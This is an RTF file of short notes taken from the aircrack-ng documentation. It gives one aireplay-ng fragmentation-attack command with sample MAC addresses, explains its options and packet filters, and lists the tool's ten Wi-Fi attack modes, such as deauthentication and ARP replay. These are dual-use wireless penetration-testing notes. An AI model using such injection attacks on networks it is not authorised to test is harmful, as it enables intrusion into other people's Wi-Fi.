{\rtf1\ansi\ansicpg1252\cocoartf2758
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 UbuntuMono-Regular;\f1\fnil\fcharset0 Menlo-Regular;\f2\fswiss\fcharset0 ArialMT;
}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;\red0\green0\blue0;\red38\green38\blue38;
\red16\green121\blue2;\red135\green135\blue135;}
{\*\expandedcolortbl;;\cssrgb\c0\c0\c0;\csgray\c0\c0;\cssrgb\c20000\c20000\c20000;
\cssrgb\c0\c53333\c0;\cssrgb\c60000\c60000\c60000;}
{\*\listtable{\list\listtemplateid1\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{square\}}{\leveltext\leveltemplateid1\'01\uc0\u9642 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid1}
{\list\listtemplateid2\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{square\}}{\leveltext\leveltemplateid101\'01\uc0\u9642 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid2}
{\list\listtemplateid3\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{square\}}{\leveltext\leveltemplateid201\'01\uc0\u9642 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid3}
{\list\listtemplateid4\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{square\}}{\leveltext\leveltemplateid301\'01\uc0\u9642 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid4}
{\list\listtemplateid5\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{square\}}{\leveltext\leveltemplateid401\'01\uc0\u9642 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid5}
{\list\listtemplateid6\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{square\}}{\leveltext\leveltemplateid501\'01\uc0\u9642 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid6}
{\list\listtemplateid7\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{square\}}{\leveltext\leveltemplateid601\'01\uc0\u9642 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid7}
{\list\listtemplateid8\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{square\}}{\leveltext\leveltemplateid701\'01\uc0\u9642 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid8}
{\list\listtemplateid9\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{square\}}{\leveltext\leveltemplateid801\'01\uc0\u9642 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid9}
{\list\listtemplateid10\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{square\}}{\leveltext\leveltemplateid901\'01\uc0\u9642 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid10}}
{\*\listoverridetable{\listoverride\listid1\listoverridecount0\ls1}{\listoverride\listid2\listoverridecount0\ls2}{\listoverride\listid3\listoverridecount0\ls3}{\listoverride\listid4\listoverridecount0\ls4}{\listoverride\listid5\listoverridecount0\ls5}{\listoverride\listid6\listoverridecount0\ls6}{\listoverride\listid7\listoverridecount0\ls7}{\listoverride\listid8\listoverridecount0\ls8}{\listoverride\listid9\listoverridecount0\ls9}{\listoverride\listid10\listoverridecount0\ls10}}
\paperw11900\paperh16840\margl1440\margr1440\vieww13440\viewh8400\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0
{\field{\*\fldinst{HYPERLINK "https://www.aircrack-ng.org/doku.php?id=fragmentation"}}{\fldrslt 
\f0\fs28 \cf2 \cb3 https://www.aircrack-ng.org/doku.php?id=fragmentation}}
\f0\fs28 \cf2 \cb3 \
\
aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0\uc0\u8232 Where:\
	
\f1 \uc0\u9642 
\f0 	-5 means run the fragmentation attack\
	
\f1 \uc0\u9642 
\f0 	-b 00:14:6C:7E:40:80 is access point MAC address\
	
\f1 \uc0\u9642 
\f0 	-h 00:0F:B5:AB:CB:9D is source MAC address of the packets to be injected\
	
\f1 \uc0\u9642 
\f0 	ath0 is the interface name\
\
\
Optionally, the following filters can be applied:\
	
\f1 \uc0\u9642 
\f0 	-b bssid : MAC address, Access Point\
	
\f1 \uc0\u9642 
\f0 	-d dmac : MAC address, Destination\
	
\f1 \uc0\u9642 
\f0 	-s smac : MAC address, Source\
	
\f1 \uc0\u9642 
\f0 	-m len : minimum packet length\
	
\f1 \uc0\u9642 
\f0 	-n len : maximum packet length\
	
\f1 \uc0\u9642 
\f0 	-u type : frame control, type field\
	
\f1 \uc0\u9642 
\f0 	-v subt : frame control, subtype field\
	
\f1 \uc0\u9642 
\f0 	-t tods : frame control, To DS bit\
	
\f1 \uc0\u9642 
\f0 	-f fromds : frame control, From DS bit\
	
\f1 \uc0\u9642 
\f0 	-w iswep : frame control, WEP bit\
\
\
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls1\ilvl0
\f2 \cf4 \cb1 {\listtext	\uc0\u9642 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 Attack 0:\'a0{\field{\*\fldinst{HYPERLINK "https://www.aircrack-ng.org/doku.php?id=deauthentication"}}{\fldrslt \cf5 \strokec5 Deauthentication}}\cf6 \strokec6 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls2\ilvl0\cf4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9642 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 Attack 1:\'a0{\field{\*\fldinst{HYPERLINK "https://www.aircrack-ng.org/doku.php?id=fake_authentication"}}{\fldrslt \cf5 \strokec5 Fake authentication}}\cf6 \strokec6 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls3\ilvl0\cf4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9642 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 Attack 2:\'a0{\field{\*\fldinst{HYPERLINK "https://www.aircrack-ng.org/doku.php?id=interactive_packet_replay"}}{\fldrslt \cf5 \strokec5 Interactive packet replay}}\cf6 \strokec6 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls4\ilvl0\cf4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9642 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 Attack 3:\'a0{\field{\*\fldinst{HYPERLINK "https://www.aircrack-ng.org/doku.php?id=arp-request_reinjection"}}{\fldrslt \cf5 \strokec5 ARP request replay attack}}\cf6 \strokec6 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls5\ilvl0\cf4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9642 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 Attack 4:\'a0{\field{\*\fldinst{HYPERLINK "https://www.aircrack-ng.org/doku.php?id=korek_chopchop"}}{\fldrslt \cf5 \strokec5 KoreK chopchop attack}}\cf6 \strokec6 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls6\ilvl0\cf4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9642 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 Attack 5:\'a0{\field{\*\fldinst{HYPERLINK "https://www.aircrack-ng.org/doku.php?id=fragmentation"}}{\fldrslt \cf5 \strokec5 Fragmentation attack}}\cf6 \strokec6 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls7\ilvl0\cf4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9642 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 Attack 6:\'a0{\field{\*\fldinst{HYPERLINK "https://www.aircrack-ng.org/doku.php?id=cafe-latte"}}{\fldrslt \cf5 \strokec5 Cafe-latte attack}}\cf6 \strokec6 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls8\ilvl0\cf4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9642 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 Attack 7:\'a0{\field{\*\fldinst{HYPERLINK "https://www.aircrack-ng.org/doku.php?id=hirte"}}{\fldrslt \cf5 \strokec5 Client-oriented fragmentation attack}}\cf6 \strokec6 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls9\ilvl0\cf4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9642 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 Attack 8:\'a0{\field{\*\fldinst{HYPERLINK "https://www.aircrack-ng.org/doku.php?id=wpa_migration_mode"}}{\fldrslt \cf5 \strokec5 WPA Migration Mode}}\cf6 \strokec6 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls10\ilvl0\cf4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9642 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 Attack 9:\'a0{\field{\*\fldinst{HYPERLINK "https://www.aircrack-ng.org/doku.php?id=injection_test"}}{\fldrslt \cf5 \strokec5 Injection test}}\cf5 \strokec5 \
\pard\tx720\pardeftab720\partightenfactor0
\cf6 \strokec6 \
\
##\
https://www.aircrack-ng.org/doku.php?id=packetforge-ng\
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0 \cf2 \cb3 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 \
}